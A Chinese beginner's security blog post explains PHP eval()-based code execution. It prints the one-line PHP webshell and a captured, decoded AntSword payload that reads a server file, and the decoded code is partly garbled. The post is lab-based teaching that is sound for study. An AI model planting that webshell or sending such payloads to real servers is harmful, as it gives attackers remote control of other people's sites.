网络安全菜鸟学习之漏洞篇——代码执行漏洞(一)

最新推荐文章于 2023-08-28 22:54:41 发布
最新推荐文章于 2023-08-28 22:54:41 发布
阅读量714 收藏 2
点赞数
分类专栏: 网络安全 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gqzszzy/article/details/109227166
版权

这篇文章我们来学习学习代码执行漏洞。代码执行漏洞顾名思义,是由于程序员编写程序的时候使用了一些不安全的函数所造成的。这样说不够生动,我们来学习一下就懂了。
这篇文章我们来学习eval()和assert()。
说到eval()和assert()不得不提到了一句话木马。(如下)

<?php @eval($_POST[value]);?>

我们发现一句话木马就是使用的是eval。我们知道我们可以通过蚁剑连接一句话木马,从而控制别人后台。那么我们是不是可以猜测一句话木马是这个函数照成的。因此我们来做以下的实验。
首先我们把以下代码写入一个1234.php文件,并保存到网站根目录。

<?php @eval(phpinfo());?>

在这里插入图片描述

我们访问它会发现它执行了phpinfo()。在这里插入图片描述
至此,我们知道了eval的作用是以php代码的形式执行括号里的内容。(@是消除警告,我个人感觉没用可以不写)
那么,我们是不是可以猜想蚁剑实际上就是发了一串代码,然后eval以php代码来运行它。
我们来验证一下。这里我们有两款软件可以用来抓包。(主要两个都有一定的几率抓包不成功)
首先我们打开一个名叫wsexplorer的软件。这款软件是用来抓取数据包,而我用它的主要原因是我的蚁剑进行代理的时候它总是报错。(我也不知道为啥,不过这会又好了,一会可以演示一下)
注:wsexplorer可能抓不到包,建议在win2003的虚拟机里面用管理员运行就可以了。(操作很简单,根着下图走就行了。)
在这里插入图片描述
注:这里一定不要勾。在这里插入图片描述
在这里插入图片描述
我们双击一下菜刀的进程,然后在菜刀上随便操作一下就可以抓到包了。在这里插入图片描述
双击任何一个包,就可以在下面看到它的具体内容。在这里插入图片描述
好,说完了这个叫wsexplorer的软件,我们来学习下用BurpSuite抓蚁剑的包。(BurpSuite上面的步骤已经讲过很多次了,现在就具体讲一下蚁剑上面的设置,如下图)
在这里插入图片描述
在这里插入图片描述
好,现在我们设置完成了,我们进行一个操作然后抓个包。我的操作是打开D:/phpStudy/PHPTutorial/WWW/sqli-labs-master/Less-1/目录下的1.txt文件。在这里插入图片描述
我们把这个包复制下来,新建个记事本放进去好具体分析一下。
注意看这个包,前面什么都正常。就它a传的值是什么鬼?
我们把它解码一下。

a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22cb8268829c1f%22%3Becho%20%40asenc(%24output)%3Becho%20%22b9f8b0f7611e%22%3B%7Dob_start()%3Btry%7B%24F%3Dbase64_decode(substr(%24_POST%5B%22m0c15c9d574594%22%5D%2C2))%3B%24P%3D%40fopen(%24F%2C%22r%22)%3Becho(%40fread(%24P%2Cfilesize(%24F)%3Ffilesize(%24F)%3A4096))%3B%40fclose(%24P)%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&m0c15c9d574594=B9RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGktbGFicy1tYXN0ZXIvTGVzcy0xLzEudHh0(原代码)

a=@ini_set("display_errors", "");
@set_time_limit(0);function asenc($out){return $out;};
function asoutput()
{$output=ob_get_contents();ob_end_clean();
echo "cb8268829c1f";
echo @asenc($output);
echo "9f8b0f7611e";}
ob_start();
try{$=base64_decode(substr($_POST["m0c15c9d574594"],));
$=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;}
catch(Exception $e)
{echo "ERROR://".$e->getMessage();};
asoutput();
die();
&m0c15c9d574594=D:/phpStudy/PHPTutorial/WWW/sqli-labs-master/Less-1/1.txt(解码后)

仔细看解码后的代码,很明显它就是我们之前猜想的利用a的值来执行一切操作。
注:substr规定了从第几位开始截取,这边抓包没显示出来,就一位一位的删。
好,eval我们算学完了,至于assert它的用法和eval一样就不讲了。(不是我偷懒,是真的一样。)
(ps:这是我写的第20篇文章了,不知不觉写了两个多月了,感谢大家的支持。还是老规矩求各位看官给点评论和关注)

红尘之尘一月
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络空间安全---漏洞基础知识
m0_52442933的博客
12-22 3655
漏洞是什么、漏洞产生的原因、漏洞产生的原理、漏洞适用场景是什么、漏洞危害是什么、漏洞利用方法是什么、漏洞怎么防护、漏洞扫描的工具 XSS跨站、SQL注入、跨站请求伪造(CSRF)、不完善的会话管理、重定向的安全隐患、越权、发送邮件的安全隐患、OS命令注入、OS命令注入、共享资源的问题、服务端请求伪造(SSRF)
XSS漏洞原理
bamanju0574的博客
08-31 214
注入型漏洞的本质都是服务端分不清用户输入的内容是数据还是指令代码,从而造成用户输入恶意代码传到服务端执行。 00x01js执行 Js是浏览器执行的前端语言,用户在存在xss漏洞的站点url后者能输入数据的部分插入js语言,服务器接收到此数据,认为是js代码,从而返回的时候执行。因此,攻击者可利用这个漏洞对站点插入任意js代码进行窃取用户的信息。 00x02 xss攻击 XSS是一...
网络安全菜鸟学习漏洞——代码执行漏洞(二)
gqzszzy的博客
12-19 265
上一文章我们主要学习eval()和assert()两个函数。这文章我们就粗浅的学习以下几个函数造成的代码执行漏洞。 preg_replace() + /e 模式 create_function() array_map() call_user_func()/call_user_func_array() array_filter() usort(),uasort() file_put_contents() fputs() 好,首先我们来学习preg_replace() + /e 模式。preg_repla
代码执行与命令执行漏洞一览
Amire0x的小乐园
11-08 378
代码执行&命令执行 代码执行 基础 用户可以通过请求将代码注入到应用中最终到WebServer中执行 当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时, 没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。 引起的函数,过滤不严导致 phpeval() assert() 大多是因为载入缓存或者模板一级对变量的处理不严导致的,如直接把一个外部可控的参数拼接到模板里,然后调用这两个函数去当成PHP代码执行 preg_replace() 执行需要存在/e参数,参数是
网络安全菜鸟学习漏洞—SSRF
gqzszzy的博客
10-16 319
文章我们会学习到CSRF。老规矩,首先我们先来了解一下SSRF。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(摘自:https://www.jianshu.com/p/d1d1c40f6d4c) 估计大家这样看非常的懵,所有我们还是做个实验来理解一下。(注:我们使用的靶场还是pikachu-master。) 首先我们打开SSRF,选择ssrf_curl。(curl
菜鸟浅谈——web安全测试
01-27
一:安全测试注意事项 1)要注意白帽子与黑客之间的区别 2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。不要对上线网站造成破坏,不要去获取网站的数据库信息等。否则等待的...
菜鸟先飞笔记——金融生学神经网络
12-22
菜鸟先飞笔记——金融生学神经网络keras一、下载Anaconda二、安装三 、准备工作四、安装keras五、试运行 一、下载Anaconda 下载链接:清华镜像。按照自己系统选择最新版的anaconda3。 二、安装 默认安装,可以自己...
菜鸟也玩LINUX——brk()漏洞重提.pdf
09-07
brk 漏洞是 Linux 操作系统中的一个严重的安全漏洞,攻击者可以通过操纵 brk 函数来攻击系统。为了防止这种攻击,系统管理员必须对 brk 函数的输入参数进行严格的检查,并对系统的安全性进行加强。同时,开发者也...
菜鸟也能玩硬件——CPU.pdf
09-24
"菜鸟也能玩硬件——CPU.pdf" CPU(Central Processing Unit)是计算机系统中最重要的一个部件,是整个计算机系统的运算控制中心。CPU 的内部结构可以分为控制、逻辑和存储三大部分。如果将 CPU 比作一台机器,...
在腾讯的第一堂产品经理课——菜鸟与鹰的距离
03-03
做产品即是做服务,本文以ATM设计为例,详细地讲述了菜鸟级产品经理在面对服务时所思考的角度和描述。在IT界,许多人会称自己为菜鸟,而每只菜鸟都会有鹰的梦想。本文转载梁宁的微信公众号,作者认为,做产品即是做...
抓包软件WSExplorer
01-10
电脑抓包软件,哪个进程,EXE网络访问都知道怎么跑,什么样的数据。
[Windows] 抓包软件{WSExplorer+1.3 岁月联盟}
04-16
网络抓包工具,可以抓取本地电脑与网络交互时发送的数据包,并对数据包内容进行二进制和明文转换,对萌新也很友好。
WSExplorer进程抓包工具
08-02
最好用的抓包工具,WSExplorer1.3 添加新功能,分离二进制和明文的内容信息,可以分别复制相应的内容,添加全局配置功能和保存方式。支持另存为TXT格式。 以前我们经常用的一些方便快捷的抓包工具现在都已经无法在IE7、IE8下使用了。貌似一些权限比较大的进程不能抓包 提示不能打开 XPSP3系统。 (IE7以上的IE都是多线程方式打开页面,在抓包的时候注意选对线程) 所以我们开发了这款抓包工具,在以前的抓包工具的基础上更人性化了,美化了界面和添加了过滤功能。
网络抓包工具WSExplorer(绿色破解)
06-23
WS Explorer 非常好用的网络抓包工具,可以抓取本地电脑与网络交互时发送的数据包,并对数据包内容进行二进制和明文转换,对于一些不加密的数据包甚至可以直接看到文字内容,很犀利的抓包工具。
wsexplorer
09-26
wsexplorer抓包工具 可以抓取本地电脑与网络交互时发送的数据包,并对数据包内容进行二进制和明文转换,对于一些不加密的数据包甚至可以直接看到文字内容,很犀利的抓包工具。
网络安全菜鸟学习漏洞——CSRF
gqzszzy的博客
10-11 345
文章我们会学习到CSRF与SSRF。首先我们先来学习一下CSRF。 什么是CSRF? 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。以上是百度给出的定义,估计大家还是有一些搞
网络安全学习》 第五部分-----远程代码执行漏洞
tomatocc的博客
01-23 577
远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数坐果率,导致在没有执行绝对路径的情况下就执行命令,可能会允许攻击者通过改变$PATH(变量)或程序执行环境的其他方面来执行一个而已构造的代码。 远程代码执行原理: 客户端向服务器发送恶意请求,该请求内容中有服务器端可执行代码,服务器端接收请求后未对来源数据做出过滤/拦截操作,从而造车给代码执行漏洞。 ...
2023陇剑杯SSW部分题目WP
最新发布
qq_41247797的博客
08-28 533
陇剑杯数据分析题目,考察从流量包分析黑客入侵的过程
2019高校运维赛writeup
蚁景网安学院
11-29 1936
MISC0x01 misc1导出数据观察可以发现最小值为0x2,最大值为0xF9,根据判断可见字符在这个范围内的应该为EBCDIC编码,且是CP1146(IBM EBCDIC英国编码) ...
html5 video如何添加进度条_HTML5前端学习之路——从菜鸟到入门到入坑
05-31
要为HTML5视频添加进度条,需要使用HTML5的video标签和JavaScript的一些代码。以下是一种实现方法: 1. 为视频添加一个视频标签,例如: ```html <video id="my-video" controls> <source src="my-video.mp4" type="video/mp4"> <source src="my-video.webm" type="video/webm"> </video> ``` 2. 创建一个进度条,例如: ```html <div id="progress-bar"> <div id="progress"></div> </div> ``` 3. 使用JavaScript代码来控制进度条。例如: ```javascript var video = document.getElementById("my-video"); var progress = document.getElementById("progress"); video.addEventListener("timeupdate", function() { var percent = video.currentTime / video.duration; progress.style.width = percent * 100 + "%"; }); ``` 这段代码将监听视频的timeupdate事件,每当视频播放时间更新时,计算出视频播放的进度百分比,并将进度条的宽度设置为该百分比。可以通过CSS样式来美化进度条。 希望这能帮到你!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值